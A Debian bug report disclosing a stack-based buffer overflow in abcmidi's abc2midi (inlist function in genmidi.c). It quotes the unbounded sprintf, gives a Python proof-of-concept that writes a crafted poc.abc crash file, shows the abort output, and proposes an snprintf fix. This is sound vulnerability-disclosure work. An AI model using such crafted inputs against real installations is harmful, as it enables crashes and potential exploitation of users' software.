Bug#1002894: abcmidi: Stack based buffer overflow in the inlist function used by abc2midi

To: "submit@bugs.debian.org" <submit@bugs.debian.org>
Subject: Bug#1002894: abcmidi: Stack based buffer overflow in the inlist function used by abc2midi
From: Kolja Grassmann <koljagrassmann@mailbox.org>
Date: Fri, 31 Dec 2021 11:05:54 +0100 (CET)
Message-id: <[🔎] 1171691862.557807.1640945154276@office.mailbox.org>
Reply-to: Kolja Grassmann <koljagrassmann@mailbox.org>, 1002894@bugs.debian.org

Package: abcmidi
Version: 20211212-1
Severity: important
Tags: security

Dear Maintainer,

There is a stack based buffer overflow in the inlist function from the genmidi.c file used by abc2midi. The issues exists in the following code:

static int inlist(place, passno)
int place;
int passno;
/* decide whether passno matches list/number for variant section */
/* handles representation of [X in the abc */
{
  int a, b;
  char* p;
  int found;
  char msg[100];
[...]
      if (!isdigit(*p)) {
        sprintf(msg, "Bad variant list : %s", atext[pitch[place]]);
        event_error(msg);
        found = 1;
      };   

As can be seen there is msg buffer with size 100. Later on sprintf is used to write data into this buffer without performing any boundary check leading to a buffer overflow. I wrote a small poc script for this in python:

#!/bin/python3
filecontent = b"""X: 0
%%M""" + b"A" *400  + b"""
K: Am
|:0"G7"B | "C"c2c cdc |00000000000000000000000000000000000000000000000000,000000000000000000000000000000000000000000000000000000000000000000 "G"Bdg "(E)"g00g | "A0"a>Fd cBA | "E0"0GBG E^FG | \
{&}G0 |_/e d c _B0 A G A d0 {c}_B0"""

f = open("poc.abc", "wb")
f.write(filecontent)
f.close()

This generates a poc.abc file. When executing the current version of abc2midi as follows this leads to a stack overflow:
$ abc2midi poc.abc -o /dev/null
4.64 December 12 2021 abc2midi
[...]
Error in line-char 4-22 : Cannot find :| || [| or |] to close variant ending
Error in line-char 4-22 : Missing :| at end of tune
*** buffer overflow detected ***: terminated
Aborted

Locally I fixed this issue by using snprintf instead as follows:

      if (!isdigit(*p)) {
        snprintf(msg, 100, "Bad variant list : %s", atext[pitch[place]]);
        event_error(msg);
        found = 1;
      };

Best regards
Kolja
-- System Information:
Debian Release: 11.0
   APT prefers stable-updates
   APT policy: (500, 'stable-updates'), (500, 'stable-security'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 5.10.0-8-amd64 (SMP w/4 CPU threads)
Kernel taint flags: TAINT_OOT_MODULE, TAINT_UNSIGNED_MODULE
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), LANGUAGE not set
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages abcmidi depends on:
ii   libc6   2.31-13+deb11u2

abcmidi recommends no packages.

Versions of packages abcmidi suggests:
pn   abcm2ps                               <none>
ii   evince [postscript-viewer]   3.38.2-1
pn   timidity | pmidi                  <none>

-- no debconf information

Reply to:

Prev by Date: Bug#1002892: abcmidi: Stack based buffer overflow in the karaokestarttrack function used by abc2midi
Next by Date: Bug#1002895: abcmidi: Stack based buffer overflow in the event_handle_instruction function used by abc2midi
Previous by thread: Bug#1002892: abcmidi: Stack based buffer overflow in the karaokestarttrack function used by abc2midi
Next by thread: Bug#1002895: abcmidi: Stack based buffer overflow in the event_handle_instruction function used by abc2midi
Index(es):
- Date
- Thread